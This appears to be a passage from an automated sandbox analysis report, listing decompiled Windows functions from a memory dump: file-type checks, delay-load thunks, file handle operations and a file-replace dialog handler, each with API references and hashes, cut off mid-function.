Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
Instruction Fuzzy Hash: 33D05E302242096B9B51AA748C02E6ABAA9DB01310F00C165BC0885141F971D970A6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00269745, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00269745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00269749
0x00269751
0x0026975a
0x00269767
0x00269761
0x00269763
0x00269763
0x0026974b
0x0026974d
0x0026974d

APIs

GetFileType.KERNELBASE(000000FF), ref: 00269751

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 16d0fbf6a67166d57770ce64df73bc5d2d799e3afbf733ca077e1863d0211e0e
Instruction ID: 4a72c233c3fdf76238f1dceb3b71574ffc0842b47b2a1afbda28d7e23532e390
Opcode Fuzzy Hash: 16d0fbf6a67166d57770ce64df73bc5d2d799e3afbf733ca077e1863d0211e0e
Instruction Fuzzy Hash: C2D012B0431201A58F225E385E09065B6599F43766738C6A4D025C50B1CB32C8D3F500

Uniqueness

Uniqueness Score: -1.00%

Function 0027C9FE, Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027C9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {

				SendDlgItemMessageW( *0x2a75c8, 0x6a, 0x402, E0026F749(_a20, _a24, _a28, _a32), 0); // executed
				return E0027A388();
			}

0x0027ca23
0x0027ca2e

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0027CA23

Part of subcall function 0027A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0027A399
Part of subcall function 0027A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0027A3AA
Part of subcall function 0027A388: IsDialogMessageW.USER32(0002032C,?), ref: 0027A3BE
Part of subcall function 0027A388: TranslateMessage.USER32(?), ref: 0027A3CC
Part of subcall function 0027A388: DispatchMessageW.USER32(?), ref: 0027A3D6

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: c468417502a498ca5478f82a1657a9167da007052e2a236ba294f4fd189a52a0
Instruction ID: 1127d1dd89ef691982ef9ca2f5b82aaa144f21cae8c6e90d3260a243900e302a
Opcode Fuzzy Hash: c468417502a498ca5478f82a1657a9167da007052e2a236ba294f4fd189a52a0
Instruction Fuzzy Hash: B8D09E35154300ABDB422B51DE0BF0ABAB2AB9CB45F404554B245740B186629D30AF16

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1A4, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027D1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0027D53A(_t3, _t4, _t8, _t9, _t10, 0x29ab6c, 0x29df08); // executed
				goto __eax;
			}

0x0027d1ae
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4045664b861145ffffbe44111ec54f40093d2eb7043f6012debb869b80d0a1c0
Instruction ID: 4b17058679959fa132276024f214e8177faca60661dd1f98652392894c510c6e
Opcode Fuzzy Hash: 4045664b861145ffffbe44111ec54f40093d2eb7043f6012debb869b80d0a1c0
Instruction Fuzzy Hash: E3B012813B9200BE36043104EE03C36022DC9D1B2C3F0C11AF00DC008094A14C701036

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1BF, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027D1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0027D53A(_t3, _t4, _t8, _t9, _t10, 0x29ab6c, 0x29df10); // executed
				goto __eax;
			}

0x0027d1ae
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b03de7f58527743d1053cfa6b971f15b4bfe00d8eb408653a234866660db8b1a
Instruction ID: fec70757dafd0d04a176163d64f5f1c8e22bf15daa0f730228776eed8add18b5
Opcode Fuzzy Hash: b03de7f58527743d1053cfa6b971f15b4bfe00d8eb408653a234866660db8b1a
Instruction Fuzzy Hash: 0FB0128237C100AE36046108AE03C36022CD8C1B2C3B0C41AF00DC0088D4A14C301036

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1C9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027D1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0027D53A(_t3, _t4, _t8, _t9, _t10, 0x29ab6c, 0x29df0c); // executed
				goto __eax;
			}

0x0027d1ae
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 956c8b4e62d73cf65f2ffa84b498a2c3809fb21bea182964211e2f07ba9c8140
Instruction ID: e4f3fe6744075284b8fb8831a4b1367c0488e043e5b1c519b729a73396ac1231
Opcode Fuzzy Hash: 956c8b4e62d73cf65f2ffa84b498a2c3809fb21bea182964211e2f07ba9c8140
Instruction Fuzzy Hash: 5CB01281378100AE36046108ED03C36033CC8D1B2C3F0C01AF40DC1040D4A14C301036

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1DD, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027D1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0027D53A(_t3, _t4, _t8, _t9, _t10, 0x29ab6c, 0x29df04); // executed
				goto __eax;
			}

0x0027d1ae
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5b189c16ca02bbc0067e87c62045966b696c6e7cdf64d1f571473148f597d530
Instruction ID: 327eccc13e831ca79041aa24b4b62227c32e6d9fa8fd6517a7ccbadb8492b1b2
Opcode Fuzzy Hash: 5b189c16ca02bbc0067e87c62045966b696c6e7cdf64d1f571473148f597d530
Instruction Fuzzy Hash: 7BB01281378100AE36046108EE03C36022CC8D1B2C3F0C01AF00DC2040D4A24C311036

Uniqueness

Uniqueness Score: -1.00%

Function 0027D7DA, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027D7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0027D53A(_t3, _t4, _t8, _t9, _t10, 0x29abcc, 0x29deb4); // executed
				goto __eax;
			}

0x0027d7e4
0x0027d7ec
0x0027d7f3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D7EC

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 124bca36c909e55959521f154cdff9eee0442dd5eb04e58033007e85423375fa
Instruction ID: ef064dd2fe84357adc94c72864be47222bb0d50afdb9ec0cfbe4809c1097ff1f
Opcode Fuzzy Hash: 124bca36c909e55959521f154cdff9eee0442dd5eb04e58033007e85423375fa
Instruction Fuzzy Hash: 61B01291278101FF35086125AF03C36433CC8E1B1C330C01FF008C804094A19C321032

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1EC, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0027D1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x29ab6c); // executed
				E0027D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0027d1b1
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fef8e91798e3b29d598792012b0764de91888c47eb5c62ad0deb6f6a27243367
Instruction ID: bd28dca1e475530a9492cc47f9e8353dfe9d3f571bdd710feb45e6bdd293783f
Opcode Fuzzy Hash: fef8e91798e3b29d598792012b0764de91888c47eb5c62ad0deb6f6a27243367
Instruction Fuzzy Hash: 0DA001966B9202BE36096255AE16C3A022DD8D6B6D3B0C95AF40E84085A8A25965147A

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1F6, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0027D1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x29ab6c); // executed
				E0027D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0027d1b1
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d136ff985cf1be42f7daffd322ede5ef490609a0098b464427675d1d64af61d8
Instruction ID: bd28dca1e475530a9492cc47f9e8353dfe9d3f571bdd710feb45e6bdd293783f
Opcode Fuzzy Hash: d136ff985cf1be42f7daffd322ede5ef490609a0098b464427675d1d64af61d8
Instruction Fuzzy Hash: 0DA001966B9202BE36096255AE16C3A022DD8D6B6D3B0C95AF40E84085A8A25965147A

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1D8, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0027D1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x29ab6c); // executed
				E0027D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0027d1b1
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d54b5892ed7198d8165f321e3681fdbea5dab2e50eb6a2d78ca7245877f40d71
Instruction ID: bd28dca1e475530a9492cc47f9e8353dfe9d3f571bdd710feb45e6bdd293783f
Opcode Fuzzy Hash: d54b5892ed7198d8165f321e3681fdbea5dab2e50eb6a2d78ca7245877f40d71
Instruction Fuzzy Hash: 0DA001966B9202BE36096255AE16C3A022DD8D6B6D3B0C95AF40E84085A8A25965147A

Uniqueness

Uniqueness Score: -1.00%

Function 0027D200, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0027D200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x29ab6c); // executed
				E0027D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0027d1b1
0x0027d1b6
0x0027d1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0027D1B6

Part of subcall function 0027D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0027D5B7
Part of subcall function 0027D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0027D5C8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8623968c64ab386e4553c3fc8cbf7771c2da6bd8fbcc020e2407335a0fb2964
Instruction ID: bd28dca1e475530a9492cc47f9e8353dfe9d3f571bdd710feb45e6bdd293783f
Opcode Fuzzy Hash: e8623968c64ab386e4553c3fc8cbf7771c2da6bd8fbcc020e2407335a0fb2964
Instruction Fuzzy Hash: 0DA001966B9202BE36096255AE16C3A022DD8D6B6D3B0C95AF40E84085A8A25965147A

Uniqueness

Uniqueness Score: -1.00%

Function 00269BD6, Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00269BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x00269bd9
0x00269be2
0x00269be5

APIs

SetEndOfFile.KERNELBASE(?,00268F33,?,?,-00001960), ref: 00269BD9

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 5bf71d23131b292237a91a8a8bcb69f24fc979a3269e4b223cbd3017e149da86
Instruction ID: 84da0f8915ad8de09e3d6654fb24cc1dc66849259cb1d64f3ae779d3d700c87e
Opcode Fuzzy Hash: 5bf71d23131b292237a91a8a8bcb69f24fc979a3269e4b223cbd3017e149da86
Instruction Fuzzy Hash: CEB012300A1005968E002B30DC088143A15E62230630041606002C5060CB12C0179600

Uniqueness

Uniqueness Score: -1.00%

Function 00279A8D, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00279A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x00279a91
0x00279a99
0x00279a9d

APIs

SetCurrentDirectoryW.KERNELBASE(?,00279CE4,C:\Windows\system32,00000000,002A85FA,00000006), ref: 00279A91

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: a0904b93ee7ff29b913dedce7e290cfcd1c92143afe5bb6220aeaa3566c2542b
Instruction ID: b8db734e0652acae9a0a282398c9fdea78e6df41d1a33d048940b6a3bb468451
Opcode Fuzzy Hash: a0904b93ee7ff29b913dedce7e290cfcd1c92143afe5bb6220aeaa3566c2542b
Instruction Fuzzy Hash: 41A01230194006968E000B30DD0DC1576515760702F0086227106C00A0CB308824A500

Uniqueness

Uniqueness Score: -1.00%

Function 002694DA, Relevance: 1.3, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E002694DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = CloseHandle( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00266C7B(0x2a00e0, _t21 + 0x1e);
				}
				return _t16;
			}

0x002694dc
0x002694de
0x002694e4
0x002694ea
0x002694fb
0x00269500
0x00269502
0x00269502
0x00269504
0x00269504
0x00269508
0x0026950e
0x0026951e
0x0026951e
0x00269527

APIs

CloseHandle.KERNELBASE(000000FF), ref: 002694F5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e5c2551d623d1081d31e7045cdecbf5227dd4d2061f2157584897e34fda03ddb
Instruction ID: de251030c027198bcfe15a02146337033665632fc186f64a94ecb59764181139
Opcode Fuzzy Hash: e5c2551d623d1081d31e7045cdecbf5227dd4d2061f2157584897e34fda03ddb
Instruction Fuzzy Hash: C2F0BE70462B418EDB318E248549792B7E89B12730F048B1E80E7434E09B3168ED8B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0027AFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0027AFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E0027D940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E002612D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E0026FAB1( &_a2640, _a6752, 0x800);
						E0026BA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0x29df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00263E41( &_a900, 0x200, L"%s %s %s", E0026DA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E00279D99();
								_push(E0026DA42(0 + _a344, 0x98));
								E00263E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0x2a75f4; // 0x0
							E0027082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
